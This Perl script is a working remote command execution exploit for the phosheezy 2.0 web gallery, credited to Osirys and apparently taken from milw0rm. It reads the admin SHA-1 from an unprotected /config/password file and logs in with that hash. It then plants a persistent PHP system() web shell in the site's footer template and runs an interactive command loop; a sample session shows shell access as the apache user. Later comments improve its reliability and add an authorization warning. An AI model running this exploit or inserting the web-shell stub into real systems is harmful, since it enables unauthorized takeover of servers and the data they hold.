#!/usr/bin/perl
# phosheezy 2.0 Remote Command Execution Exploit

# phosheezy 2.0
# http://www.ryneezy.net/apps/phosheezy/phosheezy-v0.2.tar.gz
# Remote Command Execution Exploit
# by Osirys
# osirys[at]live[dot]it
# osirys.org
# Greets: HaVoC, x0r, jay, BlackLight
# lol at athos

# --------------------------------------------------------------
# How it works (each step is a request made by the code below):
#   1. GET  /config/password      - the admin SHA-1 is read from a file
#                                   the web server hands out unauthenticated
#   2. POST /admin.php            - the script posts that hash itself as the
#                                   "password" field and checks for the admin
#                                   welcome page, so no cracking is needed
#   3. POST /admin.php?action=3   - the "footer" layout field is saved with a
#                                   <?php system($_GET[cmd]);?> stub in it
#   4. GET  /index.php?cmd=...    - the stub runs the command and its output
#                                   is read back from between the
#                                   <!-- cmd --> and <!--cmd--> markers
# NOTE: step 3 is a persistent change to the site's template - the stub
# stays until the layout is edited back. Run this only against systems you
# are authorized to test, and restore the original layout afterwards.
# --------------------------------------------------------------
# Exploit in action :D
# --------------------------------------------------------------
# osirys[~]>$ perl exp.txt http://localhost/phosheezy/
#
#   ----------------------------
#      Phosheezy RCE Exploit
#         Coded by Osirys
#   ----------------------------
#
# [+] Admin password found:
#     Sha1 pwd: 8942c747dc48c47a6f7f026df85a448046348a2c
# [+] Grabbing server headers to get a valid SESSION ID ..
# [+] SESSION ID grabbed: 3srqiuh8jrttt73tbd7j5uvhi2
# [+] Succesfully logged in as Administrator
# [+] Template edited, RCE Vulnerability Created !
# shell$> id
# uid=80(apache) gid=80(apache) groups=80(apache)
# shell$> exit
# [-] Quitting ..
# osirys[~]>$
# --------------------------------------------------------------

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket;

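# Target base URL, e.g. http://host/phosheezy/ (the trailing slash is what
# the "$path . '.' . $adm_path" concatenation in the login sub expects).
my $host       = $ARGV[0];
# Paths are plain strings: the page had them in backticks, which would have
# run "/config/password" etc. as local shell commands instead of using them.
my $pwd_path   = "/config/password";      # file that serves the admin SHA-1
my $adm_path   = "/admin.php";            # login form
my $templ_path = "/admin.php?action=3";   # "edit layout" form

help("-1") unless ($host);
cheek($host) == 1 || help("-2");
banner();

# get_data() splits the URL into host and path; the login/template subs
# read these two package globals, so keep them global rather than lexical.
our ($h0st, $path);
my $datas = get_data($host);
die "[-] Could not parse hostname and path from '$host'\n"
    unless defined $datas && $datas =~ /\A(\S+) (\S+)\z/;
($h0st, $path) = ($1, $2);

# Step 1: fetch the password file. Trailing slashes are stripped from the
# base URL first so the request path does not contain "//".
(my $base = $host) =~ s{/+\z}{};
my $re = get_req($base . $pwd_path);

my $password;
# \b guards keep a 40-hex run embedded in a longer token from matching.
if ($re =~ /\b([0-9a-f]{40})\b/) {
    $password = $1;
    print "[+] Admin password found:\n";
    print "    Sha1 pwd: $password  \n";
    adm_log($password);
}
else {
    print "[-] Unable to get sha1 Admin password\n\n";
    exit(1);   # non-zero: the run did not succeed
}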

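# Step 2: log in to admin.php by posting the SHA-1 pulled from
# /config/password as the "password" field, then pick up the PHPSESSID the
# server sets so the next request runs as the administrator.
#
# Args:    $password - 40-hex SHA-1 string found by the caller.
# Effects: prints progress; calls RCE_create($phpsessid) on success.
# Dies:    when the response is not the admin welcome page or no session
#          cookie was set.
#
# Uses LWP (already imported for get_req) instead of a hand-written
# HTTP/1.1 request on a raw socket: LWP sets Content-Type/Content-Length
# itself and reads exactly one response, so the script no longer blocks
# in a <$socket> loop waiting for a keep-alive connection to time out, and
# a non-default port in the URL is honoured instead of a hard-coded 80.
sub adm_log {
    my ($password) = @_;

    (my $base = $host) =~ s{/+\z}{};
    my $ua  = LWP::UserAgent->new(timeout => 10);
    # Array ref keeps the field order (password, Login) of the original post.
    my $res = $ua->post($base . $adm_path,
                        [ password => $password, Login => 'Login' ]);

    print "[+] Grabbing server headers to get a valid SESSION ID ..\n";
    my $phpsessid;
    for my $cookie ($res->header('Set-Cookie')) {
        # Value ends at ';' or whitespace; the old pattern required a ';'
        # after the id, which is absent when the cookie has no attributes.
        next unless defined $cookie && $cookie =~ /PHPSESSID=([^;\s]+)/;
        $phpsessid = $1;
        print "[+] SESSION ID grabbed: $phpsessid\n";
        last;
    }

    my $logged_in =
        ($res->content =~ /Welcome to Ryneezy PhoSheezy web administration/) ? 1 : 0;
    print "[+] Succesfully logged in as Administrator\n" if $logged_in;

    ($logged_in && $phpsessid)
        || die "[-] Exploit failed -> Login Failed or SESSION ID not grabbed!\n";
    RCE_create($phpsessid);
}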

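# Step 3: submit the "edit layout" form (admin.php?action=3) as the
# logged-in admin. The header/footer values are the ones the original
# request sent; the footer carries a PHP stub bracketed by "<!-- cmd -->"
# and "<!--cmd-->" so exec_cmd() can cut the command output out of the
# rendered page.
#
# This edit is PERSISTENT on the target: the stub stays in the site's
# template until the layout is edited back.
#
# Args:    $phpsessid - session id taken from the login response.
# Effects: prints progress; calls exec_cmd() once the server confirms the
#          edit ("Edit layout again" in the response body).
# Dies:    when that confirmation text is not returned.
sub RCE_create {
    my ($phpsessid) = @_;

    (my $base = $host) =~ s{/+\z}{};
    # Array ref keeps the field order (header, footer, Submit) of the
    # original request; single quotes keep "$_GET" literal. LWP form-encodes
    # the values, which the server decodes to exactly the raw text the
    # original sent.
    my $form = [
        header => 'Ryneezy PhoSheezy</title><body bgcolor="#ffffff" text="#000000">',
        footer => '</body><!-- cmd --><?php system($_GET[cmd]);?><!--cmd-->',
        Submit => 'Edit Layout',
    ];
    my $ua  = LWP::UserAgent->new(timeout => 10);
    my $res = $ua->post($base . $templ_path, $form,
                        Cookie => "PHPSESSID=$phpsessid; hotlog=1");

    my $rce_c = ($res->content =~ /Edit layout again/) ? 1 : 0;
    print "[+] Template edited, RCE Vulnerability Created !\n" if $rce_c;

    $rce_c == 1 || die "[-] Can't edit Template. Exploit failed\n\n";
    exec_cmd();
}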

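# Step 4: interactive loop. Each line typed on STDIN is sent as
# /index.php?cmd=<percent-encoded command>; the stub planted by
# RCE_create() runs it, and the output is read back from between the
# "<!-- cmd -->" and "<!--cmd-->" markers in the page.
#
# Fixes over the recursive original:
#   - a loop instead of recursion (the old version recursed once per command
#     and spun forever on EOF, since <STDIN> returning undef never matched
#     "exit");
#   - "exit" must be the whole command ("cat exit.txt" used to quit);
#   - the command is percent-encoded, so spaces, '&', '#', '+' and the
#     trailing newline no longer corrupt the query string;
#   - the capture spans lines (/s), so multi-line output is printed in full
#     instead of just its first line.
sub exec_cmd {
    (my $base = $host) =~ s{/+\z}{};

    while (1) {
        print "shell\$> ";
        my $cmd = <STDIN>;
        if (!defined $cmd) {           # EOF (Ctrl-D / closed pipe)
            print "\n";
            die "[-] Quitting ..\n";
        }
        chomp $cmd;
        die "[-] Quitting ..\n" if $cmd eq 'exit';
        next if $cmd eq '';

        my $exec_url = $base . "/index.php?cmd=" . _url_encode($cmd);
        my $re = get_req($exec_url);

        if ($re =~ /<!-- cmd -->(.*?)<!--cmd-->/s) {
            my $out = $1;
            $out =~ s/\s+\z//;         # drop the newline system() leaves behind
            print $out eq '' ? "[-] Undefined output or bad cmd !\n" : "$out\n";
        }
        else {
            print "[-] Undefined output or bad cmd !\n";
        }
    }
}

# Percent-encode everything except RFC 3986 unreserved characters
# (kept local so no extra module is needed).
sub _url_encode {
    my ($s) = @_;
    $s =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord($1))/ge;
    return $s;
}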

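# Plain GET. Returns the raw response body; when the request itself fails
# LWP's own error text is returned instead, which callers treat like any
# other body that does not match what they look for (same as before).
#
# Args: $link    - absolute URL.
#       $timeout - seconds to wait, default 4 (the previous hard-coded value).
#
# $link is now lexical: the original assigned it without "my", leaking a
# package global with every request.
sub get_req {
    my ($link, $timeout) = @_;
    $timeout = 4 unless defined $timeout;

    my $ua = LWP::UserAgent->new(timeout => $timeout);
    my $response = $ua->get($link);
    return $response->content;
}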

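# Sanity-check the target argument: it must start with "http://" and have a
# non-empty host part. Returns 1 when acceptable, 0 otherwise.
#
# The pattern is anchored: the original matched "http://" anywhere in the
# string and accepted a bare "http://" (empty host), which only failed later
# with an unhelpful error. Only http:// is accepted, matching the scheme the
# rest of the script speaks.
sub cheek {
    my ($host) = @_;
    return 0 unless defined $host;
    return ($host =~ m{\Ahttp://[^/\s]+}) ? 1 : 0;
}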

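# Split "http://HOST[:PORT][/PATH]" into the host (kept verbatim, including
# any port and a leading "www.") and the path, normalised to start and end
# with "/" so the "$path . '.' . $adm_path" concatenation used by the
# login/template requests resolves to "/path/./admin.php" even when the
# user omits the trailing slash.
#
# Sets the package globals $h0st and $path (read by the other subs) and
# returns "$h0st $path"; on a URL it cannot parse the host is "" and the
# path "/", which the caller's "(\S+) (\S+)" check rejects.
#
# The original host pattern was [a-z.]{1,30}: it could not match IP
# addresses, digits, hyphens or ports (127.0.0.1, host-1:8080 all failed).
# It also stripped "www." from the host, which changed the Host header
# the server saw; the host is now passed through unchanged.
sub get_data {
    my ($host) = @_;
    my ($bare, $rest) = ('', '');
    if (defined $host && $host =~ m{\Ahttp://([^/\s]+)(?:/(.*))?\z}s) {
        ($bare, $rest) = ($1, defined $2 ? $2 : '');
    }
    $rest =~ s{\A/+}{};
    $rest .= '/' unless $rest eq '' || $rest =~ m{/\z};

    our ($h0st, $path) = ($bare, "/$rest");
    return "$h0st $path";
}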

# Print the tool banner: a blank line, four fixed-width lines (each with a
# trailing space, as the original had), and a closing blank line.
sub banner {
    my @rows = (
        "  ---------------------------- ",
        "     Phosheezy RCE Exploit     ",
        "        Coded by Osirys        ",
        "  ---------------------------- ",
    );
    print "\n", map({ "$_\n" } @rows), "\n";
    return;
}

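# Print an error line (and the banner) for the known error codes, then the
# usage line, and exit.
#
# Args: $error - -1: no target argument was given;
#                -2: the argument failed cheek();
#                anything else prints the usage line only.
#
# Exits non-zero: the original exited 0 on a usage error, so a wrapper
# could not tell a bad invocation from a successful run.
sub help {
    my ($error) = @_;
    $error = 0 unless defined $error;

    if ($error == -1) {
        banner();
        print "\n[-] Cheek that you provide a hostname address!\n";
    }
    elsif ($error == -2) {
        banner();
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(1);
}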

# milw0rm.com [2009-01-14]
